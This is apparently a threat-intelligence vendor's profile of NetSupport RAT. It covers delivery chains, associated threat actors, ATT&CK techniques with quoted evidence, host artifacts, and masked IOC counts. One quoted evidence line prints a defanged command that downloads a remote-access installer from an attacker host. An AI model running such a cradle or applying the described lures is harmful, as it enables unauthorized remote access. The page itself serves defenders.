Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 20 actorsExploits 1 CVE

NetSupport RAT

Also known asNetSupportNetSupport Manager

NetSupport RAT is the malicious use or derivative of the legitimate NetSupport Manager remote administration product, widely referred to by defenders as NetSupport RAT. It provides unauthorized remote access to compromised Windows systems and has been described as giving operators full control of an infected endpoint. Reported capabilities include remote control, file exfiltration, loading and executing additional payloads, and use as a backdoor or follow-on access mechanism.

The malware is frequently delivered through social-engineering and malware-delivery chains rather than as a standalone initial vector. Observed delivery methods in the provided content include ClickFix and paste-and-run lures that trick users into executing commands, fake CAPTCHA prompts, fake browser or software update pages, malvertising, compromised websites, malicious JavaScript loaders, signed MSIX installer chains, and custom loaders such as PowerNet. It has also appeared as a final payload or secondary payload delivered by other malware and traffic-distribution ecosystems including SocGholish/FakeUpdates, Hancitor, Scarlet Goldfinch, SmartApeSG/ZPHP/HANEYMANEY activity, GrayAlpha/FIN7-linked infrastructure, TAG-150 campaigns, and GHOSTPULSE. Specific reporting also notes attempted NetSupport RAT delivery via a briefly compromised Gizmodo website and via a supply-chain compromise of the Okendo Reviews widget.

Threat-actor and ecosystem associations directly mentioned in the content include FIN7/Carbanak, GrayAlpha, SmartApeSG, TA569-linked SocGholish operations, and broader financially motivated crimeware activity. The malware is described as a staple of financial crimeware and has been observed in intrusion chains that also led to GhostWeaver, LockBit, RansomHub, AsyncRAT, Remcos RAT, StealC, Sectop RAT, Rhadamanthys, Vidar, Lumma, and ransomware deployment.

Targeting in the provided material is primarily Windows endpoints, though campaigns delivering it have affected victims across many sectors through compromised websites, phishing, fake updates, and malvertising. Industries and victim types mentioned in related delivery ecosystems include nonprofits, schools, healthcare and hospitals, legal organizations, real estate, media, retail, hospitality, and financial organizations.

High-confidence indicators and artifacts mentioned in the content relate mainly to abused NetSupport Manager deployments: the primary execution engine client32.exe; configuration files such as client32.ini containing a gateway address and encrypted Global Security Key; suspicious placement of signed binaries in C:\Users\Public\ or randomized folders; unusual cracked-license strings including NSM1234 and HANEYMANEY; and network traffic that may include the User-Agent string "NetSupport Manager/1.3."

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2020-0796SMBGhost

A legitimately signed NetSupport Manager v14.12 binary -- bearing a valid GlobalSign EV code-signing certificate issued to NETSUPPORT LTD -- is being weaponized as a Remote Access Trojan across two active delivery chains.

via breakglass intelintel.breakglass.tech
THREAT ACTORS

Groups observed using it

20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
ErrTraffic

На компьютерах под управлением Windows атакующие пытались установить NetSupport RAT. Этот троян злоупотребляет легитимным инструментом удаленного администрирования NetSupport Manager и предоставляет своим операторам доступ к зараженной системе.

via xakepxakep.ru
FIN7

Similar to other RMM tools, NetSupport manager has been exploited to be used maliciously, to a point of a malicious by-product of the platform being created - aptly named NetSupport RAT.

via intel471go.intel471.com
Carbanak

Similar to other RMM tools, NetSupport manager has been exploited to be used maliciously, to a point of a malicious by-product of the platform being created - aptly named NetSupport RAT.

via intel471go.intel471.com
SmartApeSG

The group has been linked to past campaigns that delivered dangerous tools including NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.

via cyber security newscybersecuritynews.com
TA571

The TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file.

via proofpointproofpoint.com
Scarlet Goldfinch

Scarlet Goldfinch is a cluster of activity that Red Canary first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is an RMM tool that provides the adversary remote control over a system.

via red canary blogredcanary.com
MITRE ATT&CK

Techniques & procedures

22 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583Acquire InfrastructureEvidence1

Rhadamanthys is an infostealer distributed via malspam and malvertising. Google searches for popular software such as Notion return malicious ads. Threat actors are using decoy websites to trick users into downloading malware.

Initial Access

7 techniques
T1133External Remote ServicesEvidence1

QuickAssist has become a mainstay for initial access by ransomware actors, often leveraged alongside external Microsoft Teams messages.

T1189Drive-by CompromiseEvidence4

A compromised account was exploited to inject a malicious script, briefly exposing users to scam content.

T1195Supply Chain CompromiseEvidence2

A newly discovered supply chain attack has put thousands of e-commerce websites at risk after a popular third-party reviews widget was quietly turned into a malware delivery tool.

T1566PhishingEvidence1

The attack used ClickFix-style social engineering lures in later stages.

T1566.001Spearphishing AttachmentEvidence1

TA571 email lure. In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word.

T1566.002Spearphishing LinkEvidence1

Victims who clicked the ad and visited the site were tricked with a download for NetSupport RAT. In this more recent campaign, the threat actor is pushing Rhadamanthys as the final payload, after an initial dropper.

T1566.003Spearphishing via ServiceEvidence1

Читатели сайта Gizmodo столкнулись с поддельными CAPTCHA, которые предлагали им запустить команды в терминале.

Execution

6 techniques
T1059Command and Scripting InterpreterEvidence1

LummaC2 reaches out to remote resources via encoded PowerShell commands... Threats like SocGholish and Scarlet Goldfinch sometimes use malicious scripts compressed via a zip file.

T1059.001PowerShellEvidence5

That command then pulled down a PowerShell script or HTML Application file, which installed a remote access tool or information stealer on the victim’s machine.

T1059.003Windows Command ShellEvidence1

After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi

T1059.007JavaScriptEvidence2

In this incident, the SmartApeSG injected JavaScript behaved as a staged loader, and did not attempt to execute every action immediately.

T1204User ExecutionEvidence6

Посетителей просили подтвердить, что они люди, а для этого якобы требовалось выполнить определенные действия в терминале.

T1204.002Malicious FileEvidence2

SocGholish... posing as necessary browser updates to trick users into running malicious code... Scarlet Goldfinch... uses JScript files to drop NetSupport Manager onto victim systems.

Persistence

2 techniques
T1133External Remote ServicesEvidence1

QuickAssist has become a mainstay for initial access by ransomware actors, often leveraged alongside external Microsoft Teams messages.

T1205Traffic SignalingEvidence1

Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.

Stealth

4 techniques
T1036MasqueradingEvidence1

Threat actors continue to impersonate well-known brands via sponsored search results... Because it includes the official logo and website for Notion, most users will not think twice and click on the link.

T1205Traffic SignalingEvidence1

Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.

T1218.005MshtaEvidence2

That command then pulled down a PowerShell script or HTML Application file, which installed a remote access tool or information stealer on the victim’s machine.

T1564.003Hidden WindowEvidence1

In some examples ScreenConnect is the “first stage” using a malicious VBS script to install “software” while installing ScreenConnect in the background.

Lateral Movement

1 technique
T1021Remote ServicesEvidence1

Over the last few years, threat actors have flocked to exploit legitimate remote monitoring and management (RMM) tools—blue-chip IT software like ScreenConnect, LogMeIn Resolve, and PDQ Connect—blurring the line between legitimate IT administration and malicious intrusion.

Collection

1 technique
T1115Clipboard DataEvidence2

the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”

Command and Control

3 techniques
T1105Ingress Tool TransferEvidence6

The Hancitor malware, first observed in 2015, is a downloader known to deliver several other malware. In its first years, Hancitor was observed delivering information stealers such as Pony or Vawtrak, and in recent years, Ficker stealer and NetSupport RAT. In 2021, Hancitor was observed delivering the Cobalt-Strike attack framework...

T1205Traffic SignalingEvidence1

Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.

T1219Remote Access ToolsEvidence7

На компьютерах под управлением Windows атакующие пытались установить NetSupport RAT. Этот троян злоупотребляет легитимным инструментом удаленного администрирования NetSupport Manager и предоставляет своим операторам доступ к зараженной системе.

INDICATORS OF COMPROMISE

IOCs tracked for this family

406 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
167 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
170 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
69 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app3 days ago
domain●●●●●●●●●●●●View more in app5 days ago
domain●●●●●●●●●●●●View more in app5 days ago
hash.md5●●●●●●●●●●●●View more in app5 days ago
ip.v4●●●●●●●●●●●●View more in app5 days ago
domain●●●●●●●●●●●●View more in app8 days ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching406

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution20

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping22

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.